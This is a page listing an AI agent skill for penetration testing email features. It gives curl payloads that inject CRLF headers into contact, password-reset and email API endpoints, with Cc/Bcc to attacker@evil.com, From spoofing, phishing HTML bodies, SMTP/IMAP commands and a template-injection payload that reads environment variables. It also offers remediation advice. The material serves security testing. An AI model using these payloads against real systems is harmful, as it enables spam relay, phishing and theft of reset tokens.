ReddRadar
Agent skill
testing-for-email-header-injection
Test web application email functionality for SMTP header injection vulnerabilities that allow attackers to inject additional email headers, modify recipients, and abuse contact forms for spam relay.
Install this agent skill to your Project
npx add-skill https://github.com/mukul975/Anthropic-Cybersecurity-Skills/tree/main/skills/testing-for-email-header-injection
SKILL.md
Testing for Email Header Injection
When to Use
- When testing contact forms, feedback forms, or "email a friend" functionality
- During assessment of password reset email functionality
- When testing newsletter subscription or notification email systems
- During penetration testing of applications that send emails based on user input
- When auditing email-related API endpoints for header injection
Prerequisites
- Burp Suite for intercepting and modifying HTTP requests
- Understanding of SMTP protocol and email header structure
- Knowledge of CRLF injection techniques (\r\n sequences)
- Test email accounts for receiving injected emails
- Access to application features that trigger email sending
- SMTP server logs access for monitoring injection attempts
Workflow
Step 1 — Identify Email Injection Points
# Identify form fields that end up in email headers:
# - "From" name or email address fields
# - "To" or "CC" fields in sharing features
# - Subject line inputs
# - Reply-To fields
# Common endpoints:
# POST /contact - Contact forms
# POST /share - Share via email features
# POST /invite - Invitation systems
# POST /api/send-email - Email API endpoints
# POST /forgot-password - Password reset forms
# Test basic functionality first
curl -X POST http://target.com/contact \
-d "name=Test&email=test@test.com&subject=Hello&message=Test message"
Step 2 — Test for CRLF Header Injection
# Inject additional email headers via CRLF in the email field
curl -X POST http://target.com/contact \
-d "name=Test&email=test@test.com%0ACc:attacker@evil.com&message=Test"
# Inject BCC header
curl -X POST http://target.com/contact \
-d "name=Test&email=test@test.com%0ABcc:attacker@evil.com&message=Test"
# Inject via the name field
curl -X POST http://target.com/contact \
-d "name=Test%0ACc:attacker@evil.com&email=test@test.com&message=Test"
# Inject via subject field
curl -X POST http://target.com/contact \
-d "name=Test&email=test@test.com&subject=Hello%0ABcc:attacker@evil.com&message=Test"
# Try different CRLF encoding variants
# %0D%0A (CRLF)
curl -X POST http://target.com/contact \
-d "email=test@test.com%0D%0ACc:attacker@evil.com"
# %0A (LF only)
curl -X POST http://target.com/contact \
-d "email=test@test.com%0ACc:attacker@evil.com"
# %0D (CR only)
curl -X POST http://target.com/contact \
-d "email=test@test.com%0DCc:attacker@evil.com"
# Double encoding
curl -X POST http://target.com/contact \
-d "email=test@test.com%250ACc:attacker@evil.com"
Step 3 — Inject Custom Email Content
# Override email body by injecting Content-Type and body
curl -X POST http://target.com/contact \
-d "email=test@test.com%0AContent-Type:text/html%0A%0A<h1>Phishing</h1>"
# Inject additional MIME parts
curl -X POST http://target.com/contact \
-d "email=test@test.com%0AContent-Type:multipart/mixed;boundary=boundary123%0A--boundary123%0AContent-Type:text/html%0A%0A<script>alert(1)</script>"
# Override From header for email spoofing
curl -X POST http://target.com/contact \
-d "email=test@test.com%0AFrom:ceo@target.com"
# Inject Reply-To for phishing
curl -X POST http://target.com/contact \
-d "email=test@test.com%0AReply-To:attacker@evil.com"
Step 4 — Test IMAP/SMTP Injection
# IMAP command injection via email field
curl -X POST http://target.com/webmail/search \
-d "query=test%0AEXAMINE INBOX"
# SMTP command injection
curl -X POST http://target.com/api/send \
-d "to=test@test.com%0ARCPT TO:attacker@evil.com"
# SMTP VRFY command injection
curl -X POST http://target.com/api/verify \
-d "email=test@test.com%0AVRFY admin"
# Test SMTP relay abuse
curl -X POST http://target.com/contact \
-d "email=test@test.com%0ATo:victim1@target.com%0ATo:victim2@target.com%0ATo:victim3@target.com"
Step 5 — Test JSON-Based Email APIs
# JSON API header injection
curl -X POST http://target.com/api/send-email \
-H "Content-Type: application/json" \
-d '{"to":"test@test.com\nCc:attacker@evil.com","subject":"Test","body":"Test"}'
# Array injection for multiple recipients
curl -X POST http://target.com/api/send-email \
-H "Content-Type: application/json" \
-d '{"to":["test@test.com","attacker@evil.com"],"subject":"Test","body":"Test"}'
# Template injection in email body
curl -X POST http://target.com/api/send-email \
-H "Content-Type: application/json" \
-d '{"to":"test@test.com","subject":"Test","body":"{{constructor.constructor(\"return process.env\")()}}"}'
Step 6 — Validate Findings
# Check if injected CC/BCC emails were received
# Monitor attacker@evil.com inbox for received copies
# Verify header injection via email raw source
# In received email, check "View Original" or "Show Headers"
# Look for injected Cc:, Bcc:, From:, or Reply-To: headers
# Test if the application is usable as a spam relay
# by injecting multiple recipients in BCC
# Document the full injection chain
# 1. Injection point (which field)
# 2. Encoding required (CRLF, URL encoding)
# 3. Impact (spam relay, phishing, data theft)
Key Concepts
| Concept | Description |
|---|---|
| CRLF Injection | Injecting carriage return and line feed characters to create new email headers |
| Header Injection | Adding unauthorized headers (Cc, Bcc, From) to outgoing emails |
| Spam Relay | Abusing email functionality to send spam to arbitrary recipients |
| Email Spoofing | Modifying From or Reply-To headers to impersonate trusted senders |
| MIME Manipulation | Injecting MIME boundaries to override email body content |
| SMTP Command Injection | Injecting raw SMTP commands through unsanitized email parameters |
| Newline Characters | \r\n (CRLF), \n (LF), \r (CR) used to separate email headers |
Tools & Systems
| Tool | Purpose |
|---|---|
| Burp Suite | HTTP proxy for modifying email-related form submissions |
| swaks | Swiss Army Knife for SMTP testing and header injection validation |
| OWASP ZAP | Automated scanner with email injection detection |
| mailhog | Local SMTP testing server for capturing injected emails |
| smtp4dev | Development SMTP server for monitoring email injection results |
| Nuclei | Template scanner with email header injection detection templates |
Common Scenarios
- Spam Relay — Inject BCC headers to relay mass emails through the target's SMTP server, bypassing spam filters that trust the sender domain
- Phishing via Contact Form — Modify From and Reply-To headers to send phishing emails appearing to originate from the target organization
- Password Reset Hijack — Inject CC header in password reset flow to receive a copy of reset tokens sent to the victim
- Email Content Override — Inject MIME Content-Type headers to replace legitimate email body with malicious phishing content
- Internal Email Abuse — Use header injection to send emails to internal addresses not normally accessible through the application
Output Format
## Email Header Injection Report
- **Target**: http://target.com/contact
- **Injection Point**: email field in contact form
- **Encoding Required**: URL-encoded LF (%0A)
### Findings
| # | Field | Payload | Result | Severity |
|---|-------|---------|--------|----------|
| 1 | email | test@test.com%0ACc:evil@evil.com | CC header injected | High |
| 2 | email | test@test.com%0ABcc:evil@evil.com | BCC header injected | High |
| 3 | name | Test%0AFrom:ceo@target.com | From spoofing | Medium |
### Remediation
- Validate email addresses with strict regex rejecting newline characters
- Strip \r, \n, and encoded variants from all email-related input
- Use parameterized email APIs that separate headers from data
- Implement rate limiting on email-sending functionality
Recommended Agent Skills
Expand your agent's capabilities with these related and highly-rated skills.
mukul975/Anthropic-Cybersecurity-Skills
mapping-mitre-attack-techniques
Maps observed adversary behaviors, security alerts, and detection rules to MITRE ATT&CK techniques and sub-techniques to quantify detection coverage and guide control prioritization. Use when building an ATT&CK-based coverage heatmap, tagging SIEM alerts with technique IDs, aligning security controls to adversary playbooks, or reporting threat exposure to executives. Activates for requests involving ATT&CK Navigator, Sigma rules, MITRE D3FEND, or coverage gap analysis.
mukul975/Anthropic-Cybersecurity-Skills
hunting-for-spearphishing-indicators
Hunt for spearphishing campaign indicators across email logs, endpoint telemetry, and network data to detect targeted email attacks.
mukul975/Anthropic-Cybersecurity-Skills
analyzing-malicious-url-with-urlscan
URLScan.io is a free service for scanning and analyzing suspicious URLs. It captures screenshots, DOM content, HTTP transactions, JavaScript behavior, and network connections of web pages in an isolat
mukul975/Anthropic-Cybersecurity-Skills
implementing-zero-standing-privilege-with-cyberark
Deploy CyberArk Secure Cloud Access to eliminate standing privileges in hybrid and multi-cloud environments using just-in-time access with time, entitlement, and approval controls.
mukul975/Anthropic-Cybersecurity-Skills
implementing-pam-for-database-access
Deploy privileged access management for database systems including Oracle, SQL Server, PostgreSQL, and MySQL. Covers session proxy configuration, credential vaulting, query auditing, dynamic credentia
mukul975/Anthropic-Cybersecurity-Skills
detecting-t1003-credential-dumping-with-edr
Detect OS credential dumping techniques targeting LSASS memory, SAM database, NTDS.dit, and cached credentials using EDR telemetry, Sysmon process access monitoring, and Windows security event correlation.
Didn't find tool you were looking for?